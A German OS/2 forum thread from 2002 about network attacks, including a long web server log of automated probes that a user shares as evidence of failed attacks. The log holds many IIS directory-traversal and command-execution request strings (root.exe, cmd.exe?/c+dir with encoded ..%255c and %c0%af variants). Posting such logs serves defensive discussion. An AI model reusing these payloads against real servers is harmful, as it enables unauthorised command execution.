OS2.org Site Index - Feedback - Impressum
Sprachauswahl / Choose your Language News Software Hardware Projekte Forum Tipps Links Verschiedenes
Editorial Diskussion HelpDesk Umfrage
[Forum]
in nach (Erweiterte Suche)
[Forum]
( Archiv ) ( Neues Thema )

( Zeige die Threadübersicht ) ( Zur Startübersicht )
02.04.2002
Was und wo: Analysierte Methoden, wie und welche Angriffe im Netz erfolgten (von: GA, 18:53:54) ^
http://advice.networkice.com/advice/Intrusions/

Und jetzt werden einigen Administratoren die Knie weich?
[ Leser: 85 ]

Re: Was und wo: Analysierte Methoden, wie und welche Angriffe im Netz erfolgten (von: Trap11, 21:50:46)
Hier dier Ausschnitt aus einer log Datei eines realen Angriffs (da der Server auf *** läuft -jedenfalls nicht unter Windows- macht der Angriff keinen Sinn aber die Angreifer sind wohl zu blöde um das zu begreifen, denn derServer wird seit Tagen angegriffen):

192.35.240.103 - - [02/Apr/2002:04:34:08 -0500] "GET / HTTP/1.1" 200 902 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
192.35.240.103 - - [02/Apr/2002:04:34:15 -0500] "GET /Movie1.swf HTTP/1.1" 200 77207 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
193.195.130.13 - - [02/Apr/2002:04:35:43 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:46 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:46 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:47 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:47 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:48 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:48 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:48 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:49 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:49 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:49 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:49 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:50 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:50 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:50 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
193.195.130.13 - - [02/Apr/2002:04:35:50 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:15 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:15 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:17 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:17 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:18 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:18 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:19 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:19 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:19 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:20 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:20 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:21 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:21 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:22 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:22 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
211.196.100.93 - - [02/Apr/2002:04:36:23 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:25 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:26 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:27 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:29 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:30 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:32 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:33 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:34 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:35 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:37 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:38 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:39 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:41 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:42 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:43 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
61.136.108.254 - - [02/Apr/2002:04:36:45 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:43:52 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:43:53 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:43:54 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:43:55 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:43:57 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:43:58 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:43:59 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:44:01 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:44:02 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:44:03 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:44:05 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:44:06 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:44:07 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:44:08 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:44:10 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
61.171.28.243 - - [02/Apr/2002:04:44:11 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
213.229.46.2 - - [02/Apr/2002:04:44:56 -0500] "GET / HTTP/1.1" 200 902 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)"
213.229.46.2 - - [02/Apr/2002:04:44:57 -0500] "GET /Movie1.swf HTTP/1.1" 200 77207 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)"
165.121.116.141 - - [02/Apr/2002:04:48:32 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
165.121.116.141 - - [02/Apr/2002:04:48:35 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
165.121.116.141 - - [02/Apr/2002:04:48:39 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
165.121.116.141 - - [02/Apr/2002:04:48:41 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:28 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:28 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:28 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:28 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:30 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
24.157.228.172 - - [02/Apr/2002:04:49:30 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
210.219.219.194 - - [02/Apr/2002:04:51:04 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
03.04.2002
Re: Was und wo: Analysierte Methoden, wie und welche Angriffe im Netz erfolgten (von: Ronny C., 09:12:28)
das sind fast immer irgendwelche automatisch laufenden skripte irgendwelcher sog. skript-kiddies, die alles durchprobieren. Ich habe einen Domino Go Webserver unter WSeB laufen -> ich kann dir megabyteweise solche Logs schicken. Ich habe keine richtige Lösung für diese Albernheiten efunden. Zumindest war bisher kein Angriff erfolgreich. :-)
Das Problem konnte ich lediglich umgehen, indem ich eine Firewall (eigentlich nur "die Minifassung" von TCP/IP 4.3) auch für Port 80 installiert habe. (Das funktioniert allerdings nicht, wenn du einen Webserver ins Internet stellen willst -> bei mir soll der Domino Go Webserver nur das Intranet bedienen).

If Microsoft is the answer I want my problem back!

( Zeige die Threadübersicht ) [ Version zum Drucken ] ( Zur Startübersicht )

Datum Thema
08.01.2017 *

*

Name: * eMail: Benachrichtigung

Mit * markierte Felder müssen ausgefüllt werden !


php.net OpenIT © 1998-2017 by WebTeam OS2.org